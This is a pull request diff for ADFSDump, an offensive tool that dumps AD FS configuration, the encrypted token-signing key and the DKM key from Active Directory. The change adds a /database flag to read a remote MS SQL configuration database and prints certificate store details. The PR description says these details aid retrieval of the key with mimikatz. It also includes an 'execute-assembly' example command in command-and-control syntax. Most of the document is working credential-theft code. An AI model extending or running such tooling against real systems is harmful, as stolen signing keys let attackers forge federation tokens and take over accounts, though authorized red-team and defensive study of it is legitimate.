### PR TITLE
Added support for remote MS SQL database

### DIFF
--- a/ADFSDump/ADFSDump.csproj.user
+++ b/ADFSDump/ADFSDump.csproj.user
@@ -1,4 +1,4 @@
-﻿<?xml version="1.0" encoding="utf-8"?>
+<?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup>
     <PublishUrlHistory>publish\</PublishUrlHistory>

--- a/ADFSDump/About.cs
+++ b/ADFSDump/About.cs
@@ -18,6 +18,7 @@ namespace ADFSDump.About
 
         public static void ShowHelp()
         {
+            string example = "execute-assembly ADFSDump.exe \"database:Data Source=sql.domain.com;Initial Catalog=AdfsConfigurationV4;Integrated Security=True\"";
             string Help = @"
 ADFSDump
 
@@ -32,13 +33,16 @@ Arguments:
     /domain: The FQDN of the domain, defaults to the current domain
     /server: The FQDN of the domain controller to connect to, defaults to current
     /nokey: (optional) Flag. Disable fetching of DKM key from AD
+    /database: (optional) SQL connection string if ADFS is using remote MS SQL rather than WID
 
 Requirements:
     Supports AD FS 2012 and 2016
     Must be run locally on an AD FS server. Preferably the primary
     Assumes that AD FS is configured to use WID rather than a dedicated SQL server
     Must be run using the AD FS service account
-";
+
+Example
+    " + example;
             Console.WriteLine(Help);
         }
     }

--- a/ADFSDump/Program.cs
+++ b/ADFSDump/Program.cs
@@ -16,7 +16,7 @@ namespace ADFSDump
             try
             {
                 foreach(string argument in args)
-                {
+                {                 
                     var index = argument.IndexOf(":", StringComparison.Ordinal);
                     if (index > 0)
                     {
@@ -27,7 +27,7 @@ namespace ADFSDump
                         arguments[argument] = "";
                     }
                 }
-            } catch (Exception)
+            } catch (Exception e)
             {
                Info.ShowHelp();
                Environment.Exit(1);
@@ -38,7 +38,6 @@ namespace ADFSDump
         static void Main(string[] args)
         {
             Info.ShowInfo();
-
             Dictionary<string, string> arguments = new Dictionary<string, string>();
             if (args.Length > 0) arguments = ParseArgs(args);
 
@@ -47,8 +46,8 @@ namespace ADFSDump
                 ADSearcher.GetPrivKey(arguments);
             }
             
-
-            Dictionary<string, RelyingParty>.ValueCollection rps = DatabaseReader.ReadConfigurationDb();
+            Dictionary<string, RelyingParty>.ValueCollection rps = DatabaseReader.ReadConfigurationDb(arguments);
+            
             if (rps == null)
             {
                 Environment.Exit(1);

--- a/ADFSDump/ReadDB.cs
+++ b/ADFSDump/ReadDB.cs
@@ -23,7 +23,7 @@ namespace ADFSDump.ReadDB
         private const string Adfs2019 = "AdfsConfigurationV4";
         
 
-        public static Dictionary<string, RelyingParty>.ValueCollection ReadConfigurationDb()
+        public static Dictionary<string, RelyingParty>.ValueCollection ReadConfigurationDb(Dictionary<string, string> arguments)
         {
             SqlConnection conn = null;
             string connectionString = "";
@@ -35,7 +35,14 @@ namespace ADFSDump.ReadDB
             }
             else
             {
-                connectionString = WidConnectionString;
+                if (arguments.ContainsKey("/database"))
+                {
+                    connectionString = arguments["/database"];
+                } else
+                {
+                    connectionString = WidConnectionString;
+                }
+                
             }
             try
             {
@@ -43,7 +50,7 @@ namespace ADFSDump.ReadDB
                 conn.Open();
             }  catch (Exception e)
             {
-                Console.WriteLine($"!!! Error connecting to WID.\n {e}");
+                Console.WriteLine($"!!! Error connecting to database using connection string: " + connectionString + ".\n" + e.ToString());
                 return null;
             }
             
@@ -125,7 +132,13 @@ namespace ADFSDump.ReadDB
                 if (signingToken != null)
                 {
                     XmlNode encryptedPfx = signingToken.GetElementsByTagName("EncryptedPfx")[0];
+                    XmlNode findValue = signingToken.GetElementsByTagName("FindValue")[0];
+                    XmlNode storeLocationValue = signingToken.GetElementsByTagName("StoreLocationValue")[0];
+                    XmlNode storeNameValue = signingToken.GetElementsByTagName("StoreNameValue")[0];
                     Console.WriteLine("[-] Encrypted Token Signing Key Begin\r\n{0}\r\n[-] Encrypted Token Signing Key End\r\n", encryptedPfx.InnerText);
+                    Console.WriteLine("[-] Certificate value: {0}", findValue.InnerText);
+                    Console.WriteLine("[-] Store location value: {0}", storeLocationValue.InnerText);
+                    Console.WriteLine("[-] Store name value: {0}\r\n", storeNameValue.InnerText);
                 }
 
                 Console.WriteLine("## Reading The Issuer Identifier");

--- a/README.md
+++ b/README.md
@@ -28,6 +28,7 @@ ADFSDump is a tool that will read information from Active Directory and from the
 * `/domain:`: The Active Directory domain to target. Defaults to the current domain.
 * `/server:`: The Domain Controller to target. Defaults to the current DC.
 * `/nokey`: Switch. Toggle to disable outputting the DKM key.
+* `/database`:  (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. Wrap in quotes, i.e. "/database:Data Source=sql.domain.com;Initial Catalog=AdfsConfigurationV4;Integrated Security=True"
 
 ## Compilation Instrucrtions
 
@@ -37,6 +38,6 @@ A compiled version will not be released. You'll have to compile it yourself!
 
 ### Targeting Other .NET Versions
 
-ADFSDump's default build configuration is for .NET 4.5, which will fail on systems without that version installed. To target ADFSDump for .NET 4 or 3.5, open the .sln solution, go to Project -> Rubeus Properties and change the "Target framework" to another version.
+ADFSDump's default build configuration is for .NET 4.5, which will fail on systems without that version installed. To target ADFSDump for .NET 4 or 3.5, open the .sln solution, go to Project -> ADFSDump Properties and change the "Target framework" to another version.
 
 Note that AD FS requires .NET framework 4.5, so I'm not sure why you need to use a different version anyway :wink:


### PR DESCRIPTION
Added the /database flag to supply the address of a remote MS SQL database, rather than the default WID. Information about the token signing certificate (name & location) is now also printed, to aid manual retrieval with mimikatz when it is not present in the configuration. 